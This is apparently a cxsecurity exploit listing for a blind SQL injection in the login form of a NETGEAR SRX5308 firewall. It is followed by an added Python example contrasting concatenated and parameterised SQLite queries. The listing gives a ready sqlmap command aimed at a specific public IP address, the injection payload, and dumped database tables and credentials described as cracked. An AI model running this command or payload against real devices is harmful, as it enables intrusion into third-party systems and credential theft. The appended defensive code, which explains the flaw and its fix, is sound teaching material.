NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability

2021.12.17
0x01369 (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://95.128.69.5/scgi-bin/platform.cgi" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308
NETGEAR ProSafe™ - NETGEAR Configuration Manager Login
https://95.128.69.5/scgi-bin/platform.cgi
---
Parameter: USERDBDomains.Domainname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
    Vector: AND [INFERENCE]
---
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True
available databases [1]:
[+] SQLite_masterdb

Database: SQLite_masterdb
[4 tables]
+----------+
| system   |
| logging  |
| services |
| zones    |
+----------+

passwd and shadow encryption cracked
+----------+----------+
| username | password |
+----------+----------+
| showid   | password |
+----------+----------+
| guest    | password |
+----------+----------+
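The report shows a boolean-based blind injection in the USERDBDomains.Domainname login field against a SQLite back end. The following is an added example, not code from the original report or from NETGEAR: it contrasts a string-built lookup with a bound-parameter lookup to show why only the former gives a true/false inference channel. The `domains` table, the function names, the allowlist pattern and the false-condition variant are assumptions constructed for illustration; the firmware's real query is not shown on the page.

```python
import re
import sqlite3

def make_db():
    # Constructed schema: a stand-in for whatever table the login CGI consults.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE domains (name TEXT PRIMARY KEY)")
    db.execute("INSERT INTO domains VALUES ('geardomain')")
    return db

def domain_exists_concat(db, domain):
    # Vulnerable pattern: the POST value becomes part of the SQL text,
    # so a quote inside it rewrites the WHERE clause.
    sql = "SELECT COUNT(*) FROM domains WHERE name = '" + domain + "'"
    return db.execute(sql).fetchone()[0] > 0

def domain_exists_bound(db, domain):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    sql = "SELECT COUNT(*) FROM domains WHERE name = ?"
    return db.execute(sql, (domain,)).fetchone()[0] > 0

# Defence in depth: conservative allowlist for domain names (assumed charset).
DOMAIN_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def domain_is_wellformed(domain):
    return DOMAIN_RE.fullmatch(domain) is not None

# First value is the Domainname field from the report's Payload line;
# the second is a constructed variant whose added condition is false.
TRUE_COND = "geardomain' AND 2477=2477 AND 'GOgI'='GOgI"
FALSE_COND = "geardomain' AND 2477=2478 AND 'GOgI'='GOgI"

def oracle(check):
    # If the two answers differ, the lookup leaks one bit per request.
    db = make_db()
    return check(db, TRUE_COND), check(db, FALSE_COND)

if __name__ == "__main__":
    print("concatenated:", oracle(domain_exists_concat))
    print("bound:       ", oracle(domain_exists_bound))
    print("allowlist accepts payload:", domain_is_wellformed(TRUE_COND))
```

With the bound query both inputs are treated as a literal, non-existent domain name, so the response no longer depends on the injected condition.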

Copyright 2024, cxsecurity.com

 
